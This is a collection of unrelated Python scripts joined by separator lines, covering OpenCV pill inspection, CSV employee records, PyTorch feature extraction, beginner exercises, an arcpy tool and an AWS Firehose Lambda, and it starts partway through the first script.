# cv.line(im, (max_x, max_y), (min_x, max_y),
# (0, 0, 255), 2)
# cv.line(im, (min_x, max_y), (min_x, min_y),
# (0, 0, 255), 2)
# 计算药丸轮廓垂直方向中线
mid_y = int((min_y + max_y) / 2)#中线y坐标
# cv.line(im, (min_x, mid_y), (max_x, mid_y),
# (0, 0, 255), 2)
mid_up = int((min_y + mid_y) / 2)
mid_down = int((max_y + mid_y) / 2)
cv.line(im, (min_x, mid_up), (max_x, mid_up),
(0, 0, 255), 2)
cv.line(im, (min_x, mid_down), (max_x, mid_down),
(0, 0, 255), 2)
#cv.imshow("im_line", im)
# 求药丸轮廓和上中线、下中线的交点
cross_point_up = set()
cross_point_down = set()
for cnt in new_cnts[0]: # 遍历药丸轮廓的每个点
x, y = cnt[0][0], cnt[0][1]
if y == mid_up:
cross_point_up.add((x, y))
if y == mid_down:
cross_point_down.add((x, y))
# 集合转列表
cross_point_up = list(cross_point_up)
cross_point_down = list(cross_point_down)
for p in cross_point_up:
cv.circle(im,
(p[0], p[1]), 8, #圆心、半径
(0,0,255), 2)
for p in cross_point_down:
cv.circle(im,
(p[0], p[1]), 8, #圆心、半径
(0,0,255), 2)
cv.imshow("im_circle", im)
# 求上中线、下中线长度
len_up, len_down = 0, 0
len_up = abs(cross_point_up[0][0] - cross_point_up[1][0])
len_down = abs(cross_point_down[0][0] - cross_point_down[1][0])
print("len_up:", len_up, " len_down:", len_down)
if abs(len_up - len_down) > 8:
print("大小头:", img_path)
else:
print("上下均衡:", img_path)
# 气泡检测函数
def bub_check(img_path, img_file, im, im_gray):
# 二值化处理
ret, im_bin = cv.threshold(im_gray,
170, 255,
cv.THRESH_BINARY)
cv.imshow("im_bin", im_bin)
# 腐蚀
kernel = np.ones((1, 1), np.uint8) # 计算核
erosion = cv.erode(im_bin, kernel, iterations=3)
cv.imshow("erosion", erosion)
# 提取轮廓
img, cnts, hie = cv.findContours(
erosion, # 图像
cv.RETR_LIST, # 检测所有轮廓
cv.CHAIN_APPROX_NONE) # 存储所有的轮廓坐标点
new_cnts = [] # 记录筛选后的轮廓
# 计算每个轮廓的面积,过滤掉过大、过小的轮廓
if len(cnts) > 0 : # 检测到轮廓
for cnt in cnts: # 遍历每个轮廓
area = cv.contourArea(cnt) # 计算面积
print("area:", area)
if area < 10000 and area > 10:
new_cnts.append(cnt)
im_cnt = cv.drawContours(im, # 在原图上绘制
new_cnts, # 经过筛选轮廓数据
-1, # 绘制所有轮廓
(0, 0, 255), 2) # 轮廓颜色和粗细
cv.imshow("im_cnt", im_cnt)
if len(im_cnt) > 0:
print("检测到气泡:", img_path)
# 移动图像
# ...
if __name__ == "__main__":
# 先读取待检测图像
img_dir = "test_img" # 样本所在目录
img_files = os.listdir(img_dir)
for img_file in img_files:
# 拼接图像完整路径
img_path = os.path.join(img_dir,
img_file)
# 读取图像数据
im = cv.imread(img_path, 1)
im_gray = cv.cvtColor(im,
cv.COLOR_BGR2GRAY)
cv.imshow("im", im)
cv.imshow("im_gray", im_gray)
# 调用函数气泡检测
#bub_check(img_path, img_file, im, im_gray)
# 调用函数做大小头检测
balance_check(img_path, img_file, im, im_gray)
cv.waitKey()
cv.destroyAllWindows()
|
class Organs:
def __init__(self, small_finger=None, ring_finger=None, middle_finger=None, index_finger=None, thumb=None,
little_toe=None, ring_toe=None, middle_toe=None, long_toe=None, big_toe=None,
left_ear=None, right_ear=None, left_eye=None, right_eye=None, mouth=None, nose=None, teeth=None):
# Hand
self.small_finger = small_finger
self.ring_finger = ring_finger
self.middle_finger_ = middle_finger
self.index_finger = index_finger
self.thumb = thumb
# Foot
self.little_toe = little_toe
self.ring_toe = ring_toe
self.middle_toe = middle_toe
self.long_toe = long_toe
self.big_toe = big_toe
# Face
self.left_ear = left_ear
self.right_ear = right_ear
self.left_eye = left_eye
self.right_eye = right_eye
self.mouth = mouth
self.nose = nose
self.teeth = teeth
def speak(self):
print(f"this is {self.small_finger}")
# יד ימין
class Right_hand(Organs):
def __init__(self, small_finger=None, ring_finger=None, middle_finger=None, index_finger=None, thumb=None):
super().__init__(small_finger, ring_finger, middle_finger, index_finger, thumb)
# יד שמאל
class Left_hand(Organs):
def __init__(self, small_finger=None, ring_finger=None, middle_finger=None, index_finger=None, thumb=None):
super().__init__(small_finger, ring_finger, middle_finger, index_finger, thumb)
# רגל ימין
class Right_foot(Organs):
def __init__(self, little_toe=None, ring_toe=None, middle_toe=None, long_toe=None, big_toe=None):
super().__init__(little_toe, ring_toe, middle_toe, long_toe, big_toe)
# רגל שמאל
class Left_foot(Organs):
def __init__(self, little_toe=None, ring_toe=None, middle_toe=None, long_toe=None, big_toe=None):
super().__init__(little_toe, ring_toe, middle_toe, long_toe, big_toe)
# פנים
class Face(Organs):
def __init__(self, left_ear=None, right_ear=None, left_eye=None, right_eye=None, mouth=None, nose=None, teeth=None):
super().__init__(left_ear, right_ear, left_eye, right_eye, mouth, nose, teeth)
d1 = Face('sss')
d1.speak()
|
import csv
import os
import datetime
employees_csv = 'employees.csv'
employees_temp = 'employees_temp.csv'
class Employee:
def __init__(self, employee_id, name, phone, age):
self.uid = employee_id
self.name = name
self.phone = phone
self.age = age
def add_employee(self):
# TODO: Validate that all the data is provided
# TODO: decide if this should happen here on in the init phase
# TODO: Check if the employee already exists in the file
# Add new employee data to the file
with open('employees.csv', 'a', newline='') as employees_file:
fields = [self.uid, self.name, self.phone, self.age]
writer = csv.writer(employees_file)
writer.writerow(fields)
def add_from_file(file):
with open(file, 'r') as to_add:
for employee in csv.reader(to_add, delimiter=","):
if employee[0].isdigit():
uid = employee[0]
else:
print("Invalid UID field- UID must be a number")
break
if str(employee[1]).isalpha():
name = employee[1]
else:
print("Invalid name field for UID {0}".format(uid))
break
# TODO: consider adding a system to retry/ drop back to main menu
if employee[2].isdigit and len(employee[2]) == 10:
phone = employee[2]
else:
print("Invalid phone number for UID {0}- phone must consist of 10 digits".format(uid))
break
# Discriminating people over 120 years :)
if employee[3].isdigit:
age = datetime.date.today().year - int(employee[3])
if age > 120:
print("{0} is {1} years old and still an employee?! Fool me again...".format(name, age))
else:
print("Invalid age for UID {0}".format(uid))
break
new_emp = Employee(uid, name, phone, age)
new_emp.add_employee()
# TODO: This function uses constants from the beginning of this file. Reconsider this design decision
def delete_emp(uid):
# to_add = []
#
# with open(employees_csv, 'r') as employees_read:
# for row in csv.reader(employees_read):
# if row[0] != uid:
# to_add.append(row)
#
# with open(employees_csv, 'w', newline='') as employees_write:
# writer = csv.writer(employees_write)
# for line in to_add:
# writer.writerow(line)
with open(employees_csv, 'r') as employees_read, open(employees_temp, 'w', newline='') as employees_write:
writer = csv.writer(employees_write)
for row in csv.reader(employees_read):
if row[0] != uid:
writer.writerow(row)
if os.path.exists(employees_csv) and os.path.exists(employees_temp):
os.remove(employees_csv)
os.rename(employees_temp, employees_csv)
else:
print("File doesn't exist")
def delete_from_file(path):
with open(path, 'r') as to_delete:
reader = csv.reader(to_delete)
for row in reader:
if row[0].isdigit():
uid = row[0]
delete_emp(uid)
def validate(details):
if len(details) != 4:
return "You are to supply 4 fields"
if not details[0].isdigit():
return "The UID must be numeric"
if not details[1].isalpha():
return "Employee name must not contain numbers"
if not details[2].isdigit and len(details[2]) != 10:
return "Phone number must contain 10 digits"
if not details[3].isdigit:
return "Birth year must be numeric"
else:
age = datetime.date.today().year - int(details[3])
if age > 120:
return "{0} is {1} years old? Unbelievable!"
return True
# Checks if an employee exists in the employees file (with all of its data)
def exists(employee_row):
with open(employees_csv, 'r') as employee_read:
for row in csv.reader(employee_read):
if employee_row == row:
return True
return False
|
# -*- coding: utf-8 -*-
import os
from urllib.parse import urlparse
from scrapy.pipelines.files import FilesPipeline
class GithubPipeline(FilesPipeline):
def file_path(self, request, response=None, info=None, *, item=None):
tarball, suffix = item['name'], os.path.basename(urlparse(request.url).path)
return f'{tarball}-{suffix}'
|
import torch
from torch import nn
from torch.autograd import Variable
import torch.nn.functional as F
from torchvision import models, transforms
from torch.utils.data import DataLoader
from torchvision.datasets import ImageFolder
import numpy as np
from sklearn import preprocessing
from tqdm import tqdm
import struct
from collections import defaultdict
import os
import sys
img_transform = transforms.Compose([
transforms.Resize(480),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
train_feature_path = "train_feature"
train_path = "/path/to/landmark_clean"
train_data = ImageFolder(train_path, transform=img_transform)
train_dataloader = DataLoader(dataset=train_data, shuffle=False, num_workers=4, batch_size=1)
test_dataset = {
'oxf': {
'img_path': '/path/to/images',
'feature_path': '/path/to/feature',
},
'par':{
'img_path': '/path/to/images',
'feature_path': '/path/to/feature',
}
}
test_data_oxf = ImageFolder(test_dataset['oxf']['img_path'], transform=img_transform)
test_dataloader_oxf = DataLoader(dataset=test_data_oxf, shuffle=False, num_workers=4, batch_size=1)
test_data_par = ImageFolder(test_dataset['par']['img_path'], transform=img_transform)
test_dataloader_par = DataLoader(dataset=test_data_par, shuffle=False, num_workers=4, batch_size=1)
test_dataloader = {
'oxf': test_dataloader_oxf,
'par': test_dataloader_par,
}
class AlexNetFeature(nn.Module):
def __init__(self):
super(AlexNetFeature, self).__init__()
alexnet = models.alexnet(pretrained=True)
self.feature = nn.Sequential(*(alexnet.features[i] for i in range(12)))
self.feature.add_module('12: Global Pooling', nn.AdaptiveMaxPool2d(1))
def forward(self, I):
f = self.feature(I)
f = f.view(f.size(0), -1)
f = F.normalize(f, p=2, dim=1)
return f
class VGGNetFeature(nn.Module):
def __init__(self):
super(VGGNetFeature, self).__init__()
vgg = models.vgg19(pretrained=True)
self.feature = nn.Sequential(*(vgg.features[i] for i in range(36)))
self.feature.add_module('36: GlobalPooling', nn.AdaptiveMaxPool2d(1))
def forward(self, I):
f = self.feature(I)
f = f.view(f.size(0), -1)
f = F.normalize(f, p=2, dim=1)
return f
class ResNetFeature(nn.Module):
def __init__(self):
super(ResNetFeature, self).__init__()
resnet = models.resnet50(pretrained=True)
self.feature = nn.Sequential(*list(resnet.children())[:-2])
self.feature.add_module('8: Global Pooling', nn.AdaptiveMaxPool2d(1))
def forward(self, I):
f = self.feature(I)
f = f.view(f.size(0), -1)
f = F.normalize(f, p=2, dim=1)
return f
def extractFeature(model, data_loader, feature_path, write_flag=False, suffix='.f.npy'):
'''
write feature to .npy file or return feature matrix.
'''
model.cuda()
model.eval()
if write_flag == True:
cnt = 0
for img, label in data_loader:
img = Variable(img).cuda()
feature = model(img)
class_path = os.path.join(feature_path, str(int(label)))
if not os.path.exists(class_path):
os.makedirs(class_path)
save_dir = os.path.join(class_path, str(cnt) + suffix)
print save_dir
np.save(save_dir, feature.cpu().data.numpy())
cnt += 1
else:
feature_map = torch.FloatTensor()
for img, _ in tqdm(data_loader):
img = Variable(img).cuda()
feature = model(img)
feature_map = torch.cat((feature_map, feature.cpu().data), 0)
feature_map = feature_map.numpy()
return feature_map
def proceeRMACfeature(img_path, src_path, dest_path):
'''
vgg16_rmac is a 1024-d vector, composed of 512-d max-pooling feature and 512-d rmac feature.
'''
folders = os.listdir(img_path)
folders.sort()
cnt = 0
for folder in folders:
folder_path = os.path.join(img_path, folder)
images = os.listdir(folder_path)
images.sort()
for img in images:
src_feature = os.path.join(src_path, img+'.vgg16_rmac')
if not os.path.exists(src_feature):
continue
print src_feature
fr = open(src_feature, 'rb')
feat_dim = 512
f_max = struct.unpack('f'*feat_dim, fr.read(4*feat_dim))
f_rmac = struct.unpack('f'*feat_dim, fr.read(4*feat_dim))
f_rmac = np.array(f_rmac)
f_rmac = f_rmac.reshape(1, -1)
f_rmac = preprocessing.normalize(f_rmac, norm='l2', axis=1)
feature_folder = os.path.join(dest_path, folder)
if not os.path.exists(feature_folder):
os.makedirs(feature_folder)
dest_feature = os.path.join(feature_folder, str(cnt) + '.frmac.npy')
np.save(dest_feature, f_rmac)
fr.close()
cnt += 1
print "number of features:", cnt
if __name__ == "__main__":
model, suffix = AlexNetFeature(), '.f.npy'
for building, building_dataloader in test_dataloader.items():
extractFeature(model, building_dataloader, test_dataset[building]['feature_path'], True, suffix) |
'''
Created on Mar 5, 2015
@author: fan
'''
import unittest
class RefTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_def_var(self):
try:
print(var)
except Exception as ex:
# except: <class 'NameError'> global name 'var' is not defined
print("except:", type(ex), ex)
def test_assign(self):
x = 4
print("x = 4", x)
x = 5
print("x = 5", x)
l1 = [1, 2, 3]
l2 = l1;
print("l1", l1)
print("l2", l2)
l1[0] = 99
print("l1[0] = 99")
print("l1", l1)
print("l2", l2)
def test_null_boolean(self):
var = None
if (var):
print(var, "is taken as boolean true")
else:
print(var, "is taken as boolean false")
def test_equality(self):
l1 = [1, 2, 3]
l2 = [1, 2, 3]
print("l1", l1, "\n", "l2", l2)
print("l1 == l2", l1 == l2)
print("l1 is l2", l1 is l2)
print()
l3 = l1
print("l1", l1, "\n", "l3", l3)
print("l1 == l3", l1 == l3)
print("l1 is l3", l1 is l3)
print()
x = 2
y = 2
print("x=%d" % x, "y=%d" % y)
print("x==y is %d" % (x == y))
print("(x is y) is %d" % (x is y))
print()
x = "abc"
y = "abc"
print("x=%s" % x, "y=%s" % y)
print("x==y is %d" % (x == y))
print("(x is y) is %d" % (x is y))
print()
x = "012345678911234567892123456789"
y = "012345678911234567892123456789"
print("x=%s" % x, "y=%s" % y)
print("x==y is %d" % (x == y))
print("(x is y) is %d" % (x is y))
def test_copy(self):
l1 = [1, 2, 3]
l2 = l1[:]
print("l1", l1, "\n", "l2", l2)
print("l1 == l2", l1 == l2)
print("l1 is l2", l1 is l2)
ad = {1: 'a', 2: 'b', 3: 'c'}
bd = ad.copy()
print("ad", ad, "\n", "bd", bd)
print("ad == bd", ad == bd)
print("ad is bd", l1 is l2)
if __name__ == "__main__":
# import sys;sys.argv = ['', 'Test.testName']
unittest.main()
|
#!/Users/test/Documents/Dice-app-ios/AutoDelarWebsite_Django/env/bin/python
from django.core import management
if __name__ == "__main__":
management.execute_from_command_line()
|
from .Dog import Dog
def start():
print("starting...")
def addDoggy(name,tricks):
instance = Dog(name)
for trick in tricks:
instance.add_trick(trick)
print(instance.tricks)
return instance
|
# -*- coding: utf-8 -*-
'''函数形参和实参测试:定义一个函数,实现两个数比较,并返回较大的值'''
#定义函数
def printMax(a,b): #形参a,b
'''函数功能:传入两个值,比较它们的大小,传入值必须类型一致,否则报错
created by fanwei
'''
if a > b:
print(a)
else:
print(b)
#调用函数
printMax(10, 9) #实参 10,9
#形参和实参必须一一对应
#printMax(10,20,21)
'''文档字符串(函数的注释)
程序的可读性最重要,一般建议在函数体开始的部分附上函数定义说明,这就是“文档字符串”,
也有人称为“函数的注释”,可以通过三个单引号,或者三个双引号来实现,中间可以加入多行文字进行说明。
调用help(函数名.__doc__)可以打印输出函数的文档字符串。
'''
help(printMax.__doc__) #help内置函数调用函数对象的__doc__属性 |
# Name: Taidgh Murray
# Student ID: 15315901
# File: bar.py
############################################################################
import math
num=input("Please enter a sequence of numbers, seperated by commas: ")
li=num.split(",")
numlist=[float(i) for i in li]
maximum=max(numlist)
N=math.log10(maximum)
for v in numlist:
r=abs(math.ceil(v/2))
print(numlist.index(v)+1,":",r*'#',"(",r,")",sep="")
print("""
|--------------------------------------------------|
0 100
""")
|
from kivy.app import App
from custom_camera.custom_camera import CameraWidget, CustomCamera
from kivy.base import Builder
Builder.load_file("custom_camera/custom_camera.kv")
class TestCamera(App):
def build(self):
camera = CameraWidget()
return camera
TestCamera().run()
|
from neo.io.basefromrawio import BaseFromRaw
from neo.rawio.elanrawio import ElanRawIO
class ElanIO(ElanRawIO, BaseFromRaw):
"""
Class for reading data from Elan.
Elan is software for studying time-frequency maps of EEG data.
Elan is developed in Lyon, France, at INSERM U821
https://elan.lyon.inserm.fr
"""
_prefered_signal_group_mode = 'split-all'
# _prefered_signal_group_mode = 'group-by-same-units'
def __init__(self, filename):
ElanRawIO.__init__(self, filename=filename)
BaseFromRaw.__init__(self, filename)
|
import arcpy
arcpy.env.overwriteOutput = True
inputFeatureclass = arcpy.GetParameterAsText(0) # rec_sites.shp
fileheight = arcpy.GetParameterAsText(1)
newFiles = arcpy.GetParameterAsText(2) # resultFile = "#"
newFields = arcpy.GetParameterAsText(3) # newFields = '#'
if newFields == '#' or not newFields:
newFields = 'HEIGHT'
# Changes occured in the input or a new file is created the user decides
if newFiles == "#" or not newFiles:
newFiles = inputFeatureclass
arcpy.AddMessage("Changes occured in the input file")
else:
arcpy.CopyFeatures_management(inputFeatureclass, newFiles)
arcpy.AddMessage("A new file has been created with changes")
# check coordinate systems for coincidence
if arcpy.Describe(newFiles).spatialReference.name == arcpy.Describe(fileheight).spatialReference.name:
arcpy.AddMessage("Coordinate systems coincide")
else:
projectnion = arcpy.Describe(fileheight).spatialReference.name
arcpy.Project_management(newFiles, newFiles, projectnion)
arcpy.AddMessage("The coordinate systems did not match. Reprojected")
# determine the value of heights in the specified coordinates
height = []
with arcpy.da.SearchCursornewFiles, 'SHAPE@XY') as cursor:
for row in cursor:
evel = arcpy.GetCellValue_management(fileheight, str(row[0][0])+' '+str(row[0][1]))
height.append(evel.getOutput(0))
arcpy.AddMessage("The values of heights by coordinates are determined")
# Create a new Field
arcpy.AddField_management(newFiles, newFields, "SHORT")
with arcpy.da.UpdateCursor(newFiles, newFields) as cursor:
i = 0
for row in cursor:
row[0] = height[i]
cursor.updateRow(row)
i += 1
arcpy.AddMessage("Created {} field and height data is recorded".format(newFields))
|
# Create Font Art using Python
# The PyFiglet library in Python can be used to visualize the output of your Python program with an amazing font style.
# Step:1
# pip install pyfiglet
import pyfiglet
font = pyfiglet.figlet_format('Nidhi Gupta')
print(font)
|
# Task: Implement find
#X v1: find <starting dir>
#X v2: find <starting dir> -name "*.txt"
#X v3: find <starting dir> -type d
import argparse
import glob
import os
class Cmd(object):
def __init__(self):
parser = argparse.ArgumentParser()
parser.add_argument("dir",
help="The starting directory", nargs='?',
type=str)
parser.add_argument("-name", help="Filter by name", type=str)
parser.add_argument("-type", help="Filter by type", type=str)
self._top_level_args = parser.parse_args()
def find(self):
path = self._top_level_args.dir if self._top_level_args.dir else '.'
path += '/**' # Modify path to search in subdirectories
if self._top_level_args.name:
path += '/%s' % self._top_level_args.name
for name in glob.iglob(path, recursive=True):
if self._top_level_args.type == 'd' and not os.path.isdir(name):
continue
print(name)
if __name__ == '__main__':
Cmd().find()
|
import os
import re
import glob
import cv2
import pickle
import matplotlib as plt
import numpy as np
from PIL import Image
from mlc.function import show
from keras import backend as K
np.set_printoptions(threshold=400000000)
def show_IoU():
"""
# #jpgのみにしてください
"""
datapath = "./image/precision/"
filepath = "epicenter_center"
#labelを持ってくる
label_path = (datapath+filepath + "/label/*jpg").replace('\n', '')
files = glob.glob(label_path)
image_path = (datapath+filepath + "/image/*png").replace('\n', '')
fimage = glob.glob(image_path)
#ファイル名のみ取得
pred = os.listdir(datapath+filepath + "/label")
#取得
for j, n in enumerate(pred):
#読み込み
fpred = ("./unet_result/pred/"+n).replace('\n', '')
#for file in files:
flabel = files[j]
#print(fpred)
#print(fimage[j])
#print(flabel)
input()
pred = cv2.imread(fpred,0)
image = cv2.imread(fimage[j],0)
label = cv2.imread(flabel,0)
# show(pred)
# show(image)
# show(label)
#os.system('cls')
#precison 計算
w,h = pred.shape
label[label >240] = 0
label[label > 0] = 255
pred[pred > 250] = 255
pred[pred <= 250] = 0
pred_s = np.copy(pred)/255
label_s = np.copy(label)/255
"""
plabel :pred label (編集結果画像)
val :val image (予測したマスク画像)
label :acc label (正解マスク画像)
-正解データ
赤 0,0,255
青 255,0,0
緑 0,255,0
"""
TP,FP,FN = 0,0,0
for x in range(h):
for y in range(w):
#正解ラベル
if label[y,x] == 255:
if pred[y,x] == 255:
TP +=1
#検出結果
#未検出
if label[y,x] == 255 and pred[y,x] == 0:
FP += 1
#誤検出
if label[y,x] == 0 and pred[y,x] == 255:
FN += 1
IOU = TP / (TP + FP+ FN)
recall = TP / (TP + FN)
precision = TP / (TP + FP)
F_value = TP/(TP+(FP+FN)/2)
with open(root +"/value.txt",mode='a') as f_dataset:
f_dataset.write("dataname :"+filename + dataname)
f_dataset.write("\n IOU :"+str(IOU))
f_dataset.write("\n recall :"+str(recall))
f_dataset.write("\n precision:"+str(precision))
f_dataset.write("\n F_value :"+str(F_value))
f_dataset.write("\n----------------------------------------------------------------------\n")
print("\nIOU = ",IOU)
print("\nrecall = ",recall)
print("\nprecision = ",precision)
print("\nF_value = ",F_value)
if __name__ == "__main__":
show_IoU()
#movie_to_image(10,videopath)
|
#
# datas = [1,2,3],[0.2,0.3,0.4]
# myids = ['整数',"浮点数"]
import yaml
with open('datas/test/a.yml') as f:
datas = yaml.safe_load(f)
myids = datas.keys()
mydatas = datas.values()
def test_param(param):
print(f"param= {param}")
print("动态生成测试用例")
|
from board import Board
from ai import AI
from human import Human
human = Human()
AI = AI()
gameboard = Board()
currPlayer = human
print(gameboard)
while(gameboard.gameOver() == None):
if (type(currPlayer is Human)):
print("It is the Human's turn.\n")
#gameboard.printBoard()
moves = gameboard.getValidMoves()
print(moves)
while True:
try:
col = int(input("Please choose a column: "))
moves.index(col)
break
except ValueError:
print ("Not a valid move, try again.")
currPlayer.makeMove(gameboard, col)
print(gameboard)
#currPlayer = AI
else :
#gameboard.printBoard()
#currPlayer.makeMove
currPlayer = human
#gameboard.printBoard()
(x, y) = gameboard.gameOver()
if (x & y):
print("AI wins!")
elif (x):
print("Human wins!")
else:
print("Draw!")
print("Works!") |
from musket_core import image_datasets,datasets
@datasets.dataset_provider(origin="train.csv",kind="BinarySegmentationDataSet")
def get_segment1():
return image_datasets.BinarySegmentationDataSet(["test_images","train_images"],"train.csv","ImageId","EncodedPixels")
@datasets.dataset_provider(origin="train.csv",kind="BinarySegmentationDataSet")
def get_segment2():
return image_datasets.BinarySegmentationDataSet(["test_images","train_images"],"train.csv","ImageId","EncodedPixels")
@datasets.dataset_provider(origin="train.csv",kind="BinarySegmentationDataSet")
def get_segment3():
return image_datasets.BinarySegmentationDataSet(["test_images","train_images"],"train.csv","ImageId","EncodedPixels")
@datasets.dataset_provider(origin="train.csv",kind="BinarySegmentationDataSet")
def get_segment4():
return image_datasets.BinarySegmentationDataSet(["test_images","train_images"],"train.csv","ImageId","EncodedPixels")
@datasets.dataset_provider(origin="classify.csv",kind="MultiClassificationDataset")
def get_classify():
return image_datasets.MultiClassClassificationDataSet(["test_images","train_images"],"classify.csv","ImageId","ClassId")
|
def main ():
item_names = []
item_prices = []
item_counts = []
grandtotal = 0
print ("This program will help to calculate the customer's invoice.\n")
item_name = input ("Enter the name of the first item purchased.")
while (len(item_name) > 0):
item_names.append (item_name);
item_counts.append(int(input ("How many " + item_name + " were purchased? ")))
item_prices.append(float(input ("What was the price for each " + item_name + "? ")))
item_name = input("\nEnter the name of the next item purchased. (Press enter when done.)")
print ("\n\n%-30s%10s%12s%10s" % ("Item Name", "Cost Each", "Quantity", "Total"))
for i in range (0, len(item_names)):
itemName = item_names[i]
itemCount = item_counts [i]
itemPrice = item_prices[i]
itemTotal = itemCount * itemPrice
print ("%-30s%10.2f%12d%10.2f" % (itemName, itemCount, itemPrice, itemTotal))
# Grand total and exit
print ("\n\tGrand Total: $%.2f" % (grandtotal))
main() |
class Car:
wheel_type ="Firestone"
make="Mercedes"
year_of_manufacture=2016
#Runs as soon as you create an Object
def __init__(self,milage,age):
print(" I am the constructore method")
self.milage=milage
self.miaka=age
def stopDist(self):
print("{} stopping distance is 30M".format(self.name))
def park(self):
print("{} is currently parking".format(self.name))
# car1= Car()
#car1.name="X6"
# car1.stopDist()
# car2=Car()
# car2.name="Telsa CyberTruck"
# car2.park()
car3=Car(123,6)
car3.name="Jane"
print(car3.milage)
print(car3.miaka)
print(car3.name)
"""
Student Class
con method:
method :
1.to find total marks- totalMarks()
2.Find the avg core- averageScore()
3.grade the student-gradeStudent()
"""
|
import base64
import json
import logging
import time
logger = logging.getLogger()
logger.setLevel(logging.INFO)
output = []
def lambda_handler(event, context):
for record in event['records']:
try:
#Input data is base64 encode, need to decode it
decodedData = base64.b64decode(record['data'].encode('utf-8'))
originalData = json.loads(decodedData.decode('utf-8'))
#Enrich data
enrichedOutput = {
'First_Name': originalData['First_Name'],
'Last_Name': originalData['Last_Name']
}
#Prepare Output
outputData = base64.b64encode(json.dumps(enrichedOutput).encode('utf-8')).decode('utf-8')
#Object back to firehose
output_record = {
'recordId': record['recordId'],
'result': 'Ok',
'data': outputData
}
logger.info("Success")
except Exception as e:
logger.error('Exception: ' + str(e))
#Processingfailed
output_record = {
'recordId': record['recordId'],
'result': 'ProcessingFailed',
'data': record['data']
}
output.append(output_record)
return {'records': output} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.